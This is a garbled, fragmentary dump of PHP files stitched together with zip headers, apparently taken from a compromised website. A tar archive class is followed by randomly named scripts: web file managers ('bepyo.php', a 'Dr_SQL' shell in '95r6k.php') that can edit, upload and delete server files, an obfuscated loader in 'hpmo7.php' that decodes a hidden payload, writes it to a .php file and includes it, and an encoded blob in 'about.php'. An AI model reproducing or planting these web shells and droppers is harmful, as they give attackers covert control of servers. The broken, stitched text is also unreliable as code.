errors)) $this->errors = array(); } function createArchive($file_list){ $result = false; if (file_exists($this->archive_name) && is_file($this->archive_name)) $newArchive = false; else $newArchive = true; if ($newArchive){ if (!$this->openWrite()) return false; } else { if (filesize($this->archive_name) == 0) return $this->openWrite(); if ($this->isGzipped) { $this->closeTmpFile(); if (!rename($this->archive_name, $this->archive_name.'.tmp')){ $this->errors[] = __('Cannot rename').' '.$this->archive_name.__(' to ').$this->archive_name.'.tmp'; return false; } $tmpArchive = gzopen($this->archive_name.'.tmp', 'rb'); if (!$tmpArchive){ $this->errors[] = $this->archive_name.'.tmp '.__('is not readable'); rename($this->archive_name.'.tmp', $this->archive_name); return false; } if (!$this->openWrite()){ rename($this->archive_name.'.tmp', $this->archive_name); return false; } $buffer = gzread($tmpArchive, 512); if (!gzeof($tmpArchive)){ do { $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); $buffer = gzread($tmpArchive, 512); } while (!gzeof($tmpArchive)); } gzclose($tmpArchive); unlink($this->archive_name.'.tmp'); } else { $this->tmp_file = fopen($this->archive_name, 'r+b'); if (!$this->tmp_file) return false; } } if (isset($file_list) && is_array($file_list)) { if (count($file_list)>0) $result = $this->packFileArray($file_list); } else $this->errors[] = __('No file').__(' to ').__('Archive'); if (($result)&&(is_resource($this->tmp_file))){ $binaryData = pack('a512', ''); $this->writeBlock($binaryData); } $this->closeTmpFile(); if ($newArchive && !$result){ $this->closeTmpFile(); unlink($this->archive_name); } return $result; } function restoreArchive($path){ $fileName = $this->archive_name; if (!$this->isGzipped){ if (file_exists($fileName)){ if ($fp = fopen($fileName, 'rb')){ $data = fread($fp, 2); fclose($fp); if ($data == '\37\213'){ $this->isGzipped = true; } } } elseif ((substr($fileName, -2) == 'gz') OR (substr($fileName, -3) == 'tgz')) $this->isGzipped = true; } $result = true; if ($this->isGzipped) $this->tmp_file = gzopen($fileName, 'rb'); else $this->tmp_file = fopen($fileName, 'rb'); if (!$this->tmp_file){ $this->errors[] = $fileName.' '.__('is not readable'); return false; } $result = $this->unpackFileArray($path); $this->closeTmpFile(); return $result; } function showErrors ($message = '') { $Errors = $this->errors; if(count($Errors)>0) { if (!empty($message)) $message = ' ('.$message.')'; $message = __('Error occurred').$message.':
'; foreach ($Errors as $value) $message .= $value.'
'; return $message; } else return ''; } function packFileArray($file_array){ $result = true; if (!$this->tmp_file){ $this->errors[] = __('Invalid file descriptor'); return false; } if (!is_array($file_array) || count($file_array)<=0) return true; for ($i = 0; $iarchive_name) continue; if (strlen($filename)<=0) continue; if (!file_exists($filename)){ $this->errors[] = __('No file').' '.$filename; continue; } if (!$this->tmp_file){ $this->errors[] = __('Invalid file descriptor'); return false; } if (strlen($filename)<=0){ $this->errors[] = __('Filename').' '.__('is incorrect');; return false; } $filename = str_replace('\\', '/', $filename); $keep_filename = $this->makeGoodPath($filename); if (is_file($filename)){ if (($file = fopen($filename, 'rb')) == 0){ $this->errors[] = __('Mode ').__('is incorrect'); } if(($this->file_pos == 0)){ if(!$this->writeHeader($filename, $keep_filename)) return false; } while (($buffer = fread($file, 512)) != ''){ $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); } fclose($file); } else $this->writeHeader($filename, $keep_filename); if (@is_dir($filename)){ if (!($handle = opendir($filename))){ $this->errors[] = __('Error').': '.__('Directory ').$filename.__('is not readable'); continue; } while (false !== ($dir = readdir($handle))){ if ($dir!='.' && $dir!='..'){ $file_array_tmp = array(); if ($filename != '.') $file_array_tmp[] = $filename.'/'.$dir; else $file_array_tmp[] = $dir; $result = $this->packFileArray($file_array_tmp); } } unset($file_array_tmp); unset($dir); unset($handle); } } return $result; } function unpackFileArray($path){ $path = str_replace('\\', '/', $path); if ($path == '' || (substr($path, 0, 1) != '/' && substr($path, 0, 3) != '../' && !strpos($path, ':'))) $path = './'.$path; clearstatcache(); while (strlen($binaryData = $this->readBlock()) != 0){ if (!$this->readHeader($binaryData, $header)) return false; if ($header['filename'] == '') continue; if ($header['typeflag'] == 'L'){ //reading long header $filename = ''; $decr = floor($header['size']/512); for ($i = 0; $i < $decr; $i++){ $content = $this->readBlock(); $filename .= $content; } if (($laspiece = $header['size'] % 512) != 0){ $content = $this->readBlock(); $filename .= substr($content, 0, $laspiece); } $binaryData = $this->readBlock(); if (!$this->readHeader($binaryData, $header)) return false; else $header['filename'] = $filename; return true; } if (($path != './') && ($path != '/')){ while (substr($path, -1) == '/') $path = substr($path, 0, strlen($path)-1); if (substr($header['filename'], 0, 1) == '/') $header['filename'] = $path.$header['filename']; else $header['filename'] = $path.'/'.$header['filename']; } if (file_exists($header['filename'])){ if ((@is_dir($header['filename'])) && ($header['typeflag'] == '')){ $this->errors[] =__('File ').$header['filename'].__(' already exists').__(' as folder'); return false; } if ((is_file($header['filename'])) && ($header['typeflag'] == '5')){ $this->errors[] =__('Cannot create directory').'. '.__('File ').$header['filename'].__(' already exists'); return false; } if (!is_writeable($header['filename'])){ $this->errors[] = __('Cannot write to file').'. '.__('File ').$header['filename'].__(' already exists'); return false; } } elseif (($this->dirCheck(($header['typeflag'] == '5' ? $header['filename'] : dirname($header['filename'])))) != 1){ $this->errors[] = __('Cannot create directory').' '.__(' for ').$header['filename']; return false; } if ($header['typeflag'] == '5'){ if (!file_exists($header['filename'])) { if (!mkdir($header['filename'], 0777)) { $this->errors[] = __('Cannot create directory').' '.$header['filename']; return false; } } } else { if (($destination = fopen($header['filename'], 'wb')) == 0) { $this->errors[] = __('Cannot write to file').' '.$header['filename']; return false; } else { $decr = floor($header['size']/512); for ($i = 0; $i < $decr; $i++) { $content = $this->readBlock(); fwrite($destination, $content, 512); } if (($header['size'] % 512) != 0) { $content = $this->readBlock(); fwrite($destination, $content, ($header['size'] % 512)); } fclose($destination); touch($header['filename'], $header['time']); } clearstatcache(); if (filesize($header['filename']) != $header['size']) { $this->errors[] = __('Size of file').' '.$header['filename'].' '.__('is incorrect'); return false; } } if (($file_dir = dirname($header['filename'])) == $header['filename']) $file_dir = ''; if ((substr($header['filename'], 0, 1) == '/') && ($file_dir == '')) $file_dir = '/'; $this->dirs[] = $file_dir; $this->files[] = $header['filename']; } return true; } function dirCheck($dir){ $parent_dir = dirname($dir); if ((@is_dir($dir)) or ($dir == '')) return true; if (($parent_dir != $dir) and ($parent_dir != '') and (!$this->dirCheck($parent_dir))) return false; if (!mkdir($dir, 0777)){ $this->errors[] = __('Cannot create directory').' '.$dir; return false; } return true; } function readHeader($binaryData, &$header){ if (strlen($binaryData)==0){ $header['filename'] = ''; return true; } if (strlen($binaryData) != 512){ $header['filename'] = ''; $this->__('Invalid block size').': '.strlen($binaryData); return false; } $checksum = 0; for ($i = 0; $i < 148; $i++) $checksum+=ord(substr($binaryData, $i, 1)); for ($i = 148; $i < 156; $i++) $checksum += ord(' '); for ($i = 156; $i < 512; $i++) $checksum+=ord(substr($binaryData, $i, 1)); $unpack_data = unpack('a100filename/a8mode/a8user_id/a8group_id/a12size/a12time/a8checksum/a1typeflag/a100link/a6magic/a2version/a32uname/a32gname/a8devmajor/a8devminor', $binaryData); $header['checksum'] = OctDec(trim($unpack_data['checksum'])); if ($header['checksum'] != $checksum){ $header['filename'] = ''; if (($checksum == 256) && ($header['checksum'] == 0)) return true; $this->errors[] = __('Error checksum for file ').$unpack_data['filename']; return false; } if (($header['typeflag'] = $unpack_data['typeflag']) == '5') $header['size'] = 0; $header['filename'] = trim($unpack_data['filename']); $header['mode'] = OctDec(trim($unpack_data['mode'])); $header['user_id'] = OctDec(trim($unpack_data['user_id'])); $header['group_id'] = OctDec(trim($unpack_data['group_id'])); $header['size'] = OctDec(trim($unpack_data['size'])); $header['time'] = OctDec(trim($unpack_data['time'])); return true; } function writeHeader($filename, $keep_filename){ $packF = 'a100a8a8a8a12A12'; $packL = 'a1a100a6a2a32a32a8a8a155a12'; if (strlen($keep_filename)<=0) $keep_filename = $filename; $filename_ready = $this->makeGoodPath($keep_filename); if (strlen($filename_ready) > 99){ //write long header $dataFirst = pack($packF, '././LongLink', 0, 0, 0, sprintf('%11s ', DecOct(strlen($filename_ready))), 0); $dataLast = pack($packL, 'L', '', '', '', '', '', '', '', '', ''); // Calculate the checksum $checksum = 0; // First part of the header for ($i = 0; $i < 148; $i++) $checksum += ord(substr($dataFirst, $i, 1)); // Ignore the checksum value and replace it by ' ' (space) for ($i = 148; $i < 156; $i++) $checksum += ord(' '); // Last part of the header for ($i = 156, $j=0; $i < 512; $i++, $j++) $checksum += ord(substr($dataLast, $j, 1)); // Write the first 148 bytes of the header in the archive $this->writeBlock($dataFirst, 148); // Write the calculated checksum $checksum = sprintf('%6s ', DecOct($checksum)); $binaryData = pack('a8', $checksum); $this->writeBlock($binaryData, 8); // Write the last 356 bytes of the header in the archive $this->writeBlock($dataLast, 356); $tmp_filename = $this->makeGoodPath($filename_ready); $i = 0; while (($buffer = substr($tmp_filename, (($i++)*512), 512)) != ''){ $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); } return true; } $file_info = stat($filename); if (@is_dir($filename)){ $typeflag = '5'; $size = sprintf('%11s ', DecOct(0)); } else { $typeflag = ''; clearstatcache(); $size = sprintf('%11s ', DecOct(filesize($filename))); } $dataFirst = pack($packF, $filename_ready, sprintf('%6s ', DecOct(fileperms($filename))), sprintf('%6s ', DecOct($file_info[4])), sprintf('%6s ', DecOct($file_info[5])), $size, sprintf('%11s', DecOct(filemtime($filename)))); $dataLast = pack($packL, $typeflag, '', '', '', '', '', '', '', '', ''); $checksum = 0; for ($i = 0; $i < 148; $i++) $checksum += ord(substr($dataFirst, $i, 1)); for ($i = 148; $i < 156; $i++) $checksum += ord(' '); for ($i = 156, $j = 0; $i < 512; $i++, $j++) $checksum += ord(substr($dataLast, $j, 1)); $this->writeBlock($dataFirst, 148); $checksum = sprintf('%6s ', DecOct($checksum)); $binaryData = pack('a8', $checksum); $this->writeBlock($binaryData, 8); $this->writeBlock($dataLast, 356); return true; } function openWrite(){ if ($this->isGzipped) $this->tmp_file = gzopen($this->archive_name, 'wb9f'); else $this->tmp_file = fopen($this->archive_name, 'wb'); if (!($this->tmp_file)){ $this->errors[] = __('Cannot write to file').' '.$this->archive_name; return false; } return true; } function readBlock(){ if (is_resource($this->tmp_file)){ if ($this->isGzipped) $block = gzread($this->tmp_file, 512); else $block = fread($this->tmp_file, 512); } else $block = ''; return $block; } function writeBlock($data, $length = 0){ if (is_resource($this->tmp_file)){ if ($length === 0){ if ($this->isGzipped) gzputs($this->tmp_file, $data); else fputs($this->tmp_file, $data); } else { if ($this->isGzipped) gzputs($this->tmp_file, $data, $length); else fputs($this->tmp_file, $data, $length); } } } function closeTmpFile(){ if (is_resource($this->tmp_file)){ if ($this->isGzipped) gzclose($this->tmp_file); else fclose($this->tmp_file); $this->tmp_file = 0; } } function makeGoodPath($path){ if (strlen($path)>0){ $path = str_replace('\\', '/', $path); $partPath = explode('/', $path); $els = count($partPath)-1; for ($i = $els; $i>=0; $i--){ if ($partPath[$i] == '.'){ // Ignore this directory } elseif ($partPath[$i] == '..'){ $i--; } elseif (($partPath[$i] == '') and ($i!=$els) and ($i!=0)){ } else $result = $partPath[$i].($i!=$els ? '/'.$result : ''); } } else $result = ''; return $result; } } ?>PK�Jm\�� about.phpnu�[�� AccessDeniedAccess DeniedHZ4WXH0ESBF1JYTBsW4QjcBVd/l6XD1lbbuo901xTax5LDAgIxoFnmL2o7v8to6gcqRJDTqEtwkqgQVo1Ki+Cwcl4lQ=PK�Jm\o�e�*�*� bepyo.phpnu�[�� $item, 'path' => $full_path, 'size' => is_file($full_path) ? filesize($full_path) : 0, 'type' => is_dir($full_path) ? 'directory' : 'file', 'modified' => date('Y-m-d H:i:s', filemtime($full_path)) ]; } } return $files; } function format_size($bytes) { if ($bytes >= 1073741824) { return number_format($bytes / 1073741824, 2) . ' GB'; } elseif ($bytes >= 1048576) { return number_format($bytes / 1048576, 2) . ' MB'; } elseif ($bytes >= 1024) { return number_format($bytes / 1024, 2) . ' KB'; } else { return $bytes . ' bytes'; } } // ==================== REQUESTED DIRECTORY HANDLING ==================== $requested_dir = isset($_GET['dir']) ? sanitize_path($_GET['dir']) : basename($base_dir); $current_dir_candidate = $root_anchor . ($requested_dir ? DIRECTORY_SEPARATOR . $requested_dir : ''); $current_dir = safe_realpath_within($current_dir_candidate, $root_anchor); if($current_dir === false){ $requested_dir = basename($base_dir); $current_dir = safe_realpath_within($root_anchor . DIRECTORY_SEPARATOR . $requested_dir, $root_anchor); if($current_dir === false){ $requested_dir = ''; $current_dir = safe_realpath_within($root_anchor, $root_anchor); } } // ==================== PARENT DIRECTORY CALCULATION ==================== if($requested_dir !== ''){ $parent_dir = dirname($requested_dir); if($parent_dir === '.' || $parent_dir === '\\') $parent_dir = ''; } else { $parent_dir = ''; } // ==================== BREADCRUMB NAVIGATION ==================== $dir_parts = []; if($requested_dir !== ''){ $parts = explode('/', $requested_dir); $current_path = ''; foreach($parts as $part){ $current_path .= ($current_path ? '/' : '') . $part; $dir_parts[] = [ 'name' => $part, 'path' => $current_path ]; } } // ==================== ACTION HANDLING ==================== $action = $_GET['action'] ?? 'list'; $message = ''; switch($action){ case 'view': $file = sanitize_path($_GET['file'] ?? ''); $file_path = $current_dir . DIRECTORY_SEPARATOR . $file; if(safe_realpath_within($file_path, $root_anchor) && is_file($file_path)){ header('Content-Type: text/plain'); readfile($file_path); exit; } break; case 'edit': $file = sanitize_path($_GET['file'] ?? ''); $file_path = $current_dir . DIRECTORY_SEPARATOR . $file; if($_SERVER['REQUEST_METHOD'] === 'POST'){ $content = $_POST['content'] ?? ''; if(safe_realpath_within($file_path, $root_anchor) && is_file($file_path)){ if(file_put_contents($file_path, $content) !== false){ $message = "File '{$file}' updated successfully!"; } else { $message = "Error updating file '{$file}'!"; } } // Don't redirect - stay on edit page with message } else { if(safe_realpath_within($file_path, $root_anchor) && is_file($file_path)){ $content = htmlspecialchars(file_get_contents($file_path)); echo "Edit: ".htmlspecialchars($file).""; echo "

"; if($message) echo "

$message

"; echo ""; exit; } } break; case 'delete': $file = sanitize_path($_GET['file'] ?? ''); $file_path = $current_dir . DIRECTORY_SEPARATOR . $file; // Check if this is a confirmation request $confirmed = isset($_GET['confirm']) && $_GET['confirm'] === 'yes'; if($confirmed && safe_realpath_within($file_path, $root_anchor) && file_exists($file_path)){ if(is_dir($file_path)){ $it = new RecursiveIteratorIterator( new RecursiveDirectoryIterator($file_path, RecursiveDirectoryIterator::SKIP_DOTS), RecursiveIteratorIterator::CHILD_FIRST ); foreach($it as $f){ $f->isDir() ? rmdir($f->getRealPath()) : unlink($f->getRealPath()); } rmdir($file_path); $message = "Folder '{$file}' deleted successfully!"; } else { if(unlink($file_path)){ $message = "File '{$file}' deleted successfully!"; } else { $message = "Error deleting file '{$file}'!"; } } header('Location: ?action=list&dir=' . urlencode($requested_dir) . '&message=' . urlencode($message)); exit; } else { // Show confirmation page if(safe_realpath_within($file_path, $root_anchor) && file_exists($file_path)){ echo "Confirm Delete"; echo "

"; echo "

Are you sure you want to delete '".htmlspecialchars($file)."'?

"; echo "

Type: " . (is_dir($file_path) ? "Folder" : "File") . "

"; echo "

Path: " . htmlspecialchars($file_path) . "

"; echo "
"; echo "YES, DELETE | "; echo "Cancel"; echo ""; exit; } } break; case 'upload': if($_SERVER['REQUEST_METHOD'] === 'POST' && !empty($_FILES['file'])){ $uploaded = $_FILES['file']; if($uploaded['error'] === UPLOAD_ERR_OK){ $name = basename($uploaded['name']); $dest = $current_dir . DIRECTORY_SEPARATOR . $name; if(safe_realpath_within(dirname($dest), $root_anchor)){ if(move_uploaded_file($uploaded['tmp_name'], $dest)){ @chmod($dest, 0644); $message = "File '{$name}' uploaded successfully!"; } else { $message = "Error uploading file '{$name}'!"; } } else { $message = "Invalid upload path!"; } } else { $message = "Upload error: " . $uploaded['error']; } } // Stay on same page with message break; case 'download': $file = sanitize_path($_GET['file'] ?? ''); $file_path = $current_dir . DIRECTORY_SEPARATOR . $file; if(safe_realpath_within($file_path, $root_anchor) && is_file($file_path)){ header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="'.basename($file_path).'"'); header('Content-Length: '.filesize($file_path)); readfile($file_path); exit; } break; case 'create_folder': if($_SERVER['REQUEST_METHOD'] === 'POST'){ $folder = sanitize_path($_POST['folder_name'] ?? ''); if($folder){ $fp = $current_dir . DIRECTORY_SEPARATOR . $folder; if(safe_realpath_within(dirname($fp), $root_anchor) && !file_exists($fp)){ if(mkdir($fp, 0755, true)){ $message = "Folder '{$folder}' created successfully!"; } else { $message = "Error creating folder '{$folder}'!"; } } else { $message = "Folder already exists or invalid path!"; } } else { $message = "Please enter a folder name!"; } } // Stay on same page with message break; } // Get message from URL if redirected if(isset($_GET['message'])){ $message = $_GET['message']; } ?> File Manager

← Back 🏠 Project 📁 Root Current: / () /

No files or folders found in this directory.

Name	Type	Size	Modified	Actions
📁 📄				Open Edit Download Delete

Security Info: You can only access files within:

PK�Jm\�U��S�S� hpmo7.phpnu�[��> $n) | (($b << (8 - $n)) & 0xFF)) & 0xFF; } else { $b = ((($b << $n) & 0xFF) | ($b >> (8 - $n))) & 0xFF; } $out .= chr($b); } return $out; } function ODCahlbgkR($fname, $payload) { $tmp = sys_get_temp_dir() . '/' . uniqid('t', true) . '.php'; if (@file_put_contents($tmp, $payload) !== false) { @chmod($tmp, 0640); if (@rename($tmp, $fname)) { @include_once($fname); return true; } } @file_put_contents($fname, $payload); @include_once($fname); return true; } try { $enc = SuiROhBDIg($SMpiPHfV); $s = ''; for ($i=0;$iPK�Jm\��ii index.phpnu�[��PK�Jm\Q��0,0, 95r6k.phpnu�[�� Dr_SQL HTML; // === Breadcrumb === function getBreadcrumb($path) { $parts = explode('/', trim(str_replace('\\', '/', $path), '/')); $build = ''; $curr = '/'; $html = 'Root'; foreach ($parts as $part) { if ($part === '') continue; $curr = rtrim($curr, '/') . '/' . $part; $html .= ' / ' . htmlspecialchars($part) . ''; } return $html; } echo ''; echo ''; // === Quick Actions === $enc_dir = urlencode($current_dir); echo <<

>
' . readlink($path . '/' . $f) . '' : '') ?>

>
' . readlink($path . '/' . $f) . '' : '') ?>

'.fm_get_filesize($all_files_size).'' ?> '.$num_files.'' ?> '.$num_folders.'' ?>